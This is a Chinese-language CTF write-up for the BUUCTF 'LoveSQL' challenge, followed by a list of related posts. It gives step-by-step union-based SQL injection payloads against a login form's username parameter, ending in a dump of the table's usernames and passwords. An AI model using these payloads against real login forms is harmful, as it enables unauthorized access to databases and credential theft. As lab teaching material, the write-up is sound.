#和- - 表示注释,url中的#号是用来指导浏览器动作的,对服务器端无用。所以http请求中不包括#,因此使用#无法表示注入,- -(空格)在传输过程中空格会被忽略,导致无法注释
可以使用–+的方式+会被解释成空格,也可以–%20或者#可以写成%23

首先是用万能密码尝试

有成功的返回,试着看看有多少字段
?username=1’ order by 4%23&password=123有错误返回

获取回显点位
?username=1’ union select 1,2,3%23&password=123

得到2和3,接着爆数据库名
?username=1’ union select 1,database(),3%23&password=123


有了库名再爆表名
?username=1’ union select 1,database(),group_concat(table_name) from information_schema.tables where table_schema=database()%23&password=123


可以看到是有两个表,第二个看着更符合要求,接着爆该表的列名
?username=1’ union select 1,database(),group_concat(column_name) from information_schema.columns where table_name=‘l0ve1ysq1’%23&password=123


将3个字段数据显示出来
?username=1’ union select 1,database(),group_concat(id,username,password) from l0ve1ysq1%23&password=123


向右查找即可得到flag

BUUCTF [极客大挑战 2019]LoveSQL 1相关推荐

  1. BUUCTF WEB [极客大挑战 2019]LoveSQL

    BUUCTF WEB [极客大挑战 2019]LoveSQL 进入靶机后尝试万能密码登录 admin 123' or '1'='1 获得flag Login Success! Hello admin! ...

  2. BUUCTF Web [GXYCTF2019]Ping Ping Ping [极客大挑战 2019]LoveSQL [极客大挑战 2019]Knife [极客大挑战 2019]Http

    目录 [GXYCTF2019]Ping Ping Ping [极客大挑战 2019]LoveSQL [极客大挑战 2019]Knife [极客大挑战 2019]Http [GXYCTF2019]Pin ...

  3. BUUCTF [极客大挑战 2019] PHP

    BUUCTF [极客大挑战 2019] PHP 启动靶机,打开页面: 提示为备份,尝试使用脚本扫描备份文件: Python备份文件扫描脚本参考本篇文章 判断应该存在备份文件:www.zip 下载得到源 ...

  4. buu [极客大挑战 2019]LoveSQL 1

    buu [极客大挑战 2019]LoveSQL 1 -刷题个人日记 小白一个,写给自己看. 进去后是这样: 用户名输入1和1'测试 发现1'报错 有sql语法错误,说明有sql注入点且后台数据库是Ma ...

  5. BUUCTF——[极客大挑战 2019]Havefun 1

    这道题是19年的极客挑战的题,这道题整体来说,额,很简单,而且这个猫猫感觉好乖哦~!好了,进入环境 进入环境后可以看见这个界面,啧,说实话感觉没啥用,因为什么有用的价值都没有,所以老规矩,看一下它的源 ...

  6. [BUUCTF][极客大挑战 2019]Http

    思路 浏览网站发现没什么地方可以点的,那就检查元素发现可疑路径 添加Referer头 修改UA 添加XFF头 总结 在CTF中修改http头的操作常有BUUCFT另一题,常用到的值 X-Forward ...

  7. buuctf [极客大挑战 2019]Http1

    目录 知识点补充: 请求行 请求头 请求体 解题过程 知识点补充: 这道题,主要是对于http请求报文的考察.(参考(37条消息) http请求报文详解_石硕页的博客-CSDN博客_http请求报文) ...

  8. BUUCTF-WEB:[极客大挑战 2019]LoveSQL 1

    工具:Firefox,hackbar 这是一道非常常规的SQL的union联合注入的例题 步骤: union联合注入过程 第一步.测试注入点(一些小tips:利用引号,and 1=1, or 1=1之 ...

  9. [极客大挑战 2019]LoveSQL

    顶端の告诫:用 sqlmap 是没有灵魂的 尝试万能密码(其实没卵用) 'or 1=1 # 任意密码 这道题是常规的sql注入,测注入点.查字段数.爆库.爆字段值.爆表.组合拳 字段数: 1' ord ...

最新文章

  1. JAVA入门级教学之(多态)
  2. 中秋主题html,中秋节活动主题标语
  3. 计算机上网络接口层,2016计算机专业知识:TCP/IP 各层功能
  4. matlab期中考试卷,湖南大学matlab期中考试试卷分析
  5. 华为盒子显示未连接服务器,华为盒子 连接服务器地址
  6. webservice学习wsdl解读(2)
  7. [bzoj5369][状压DP]最大前缀和
  8. 基于变量推理的知识图路径推理分析
  9. R语言:Newton法、似然函数
  10. 戴尔计算机更新程序,戴尔电脑如何更新显卡驱动 其实很简单-电脑显卡怎么升级...
  11. PHP:firebase/php-jwt生成jwt和验证
  12. Dissect Eclipse Plugin Framework
  13. 摩拜+小程序,让单车变得“触手可骑”
  14. Windows 10 系统精简方案参考
  15. 机器学习(周志华)-支持向量机课后习题:
  16. eWebEditor漏洞 [转]
  17. Spring cloud 多种限流方案
  18. 数据分析让网络推广事半功倍
  19. 难道爱一个人有错吗 郑源
  20. MultipleOutputFormat和MultipleOutputs

热门文章

  1. 神雕侠侣2服务器维护,《神雕侠侣2》手游8月20日9:00-10:00停服维护公告
  2. 女人心疼男人的10种方式 太经典了!!
  3. SAP HR 年休假调整:从统休制到实休制,在一个自然年度内分段式生成年休假
  4. 李开复给中国大学生的七封公开信(其一)
  5. RabbitMq-RabbitMq简介与七种工作模式
  6. 谷歌搜索留痕外推霸屏
  7. jenkins 部署javaWeb项目
  8. HTTP服务和RPC服务,如何选择
  9. 1分钟掌握和女生约会的聊天方式
  10. 将Rational Software Architect与Rational Team Concert集成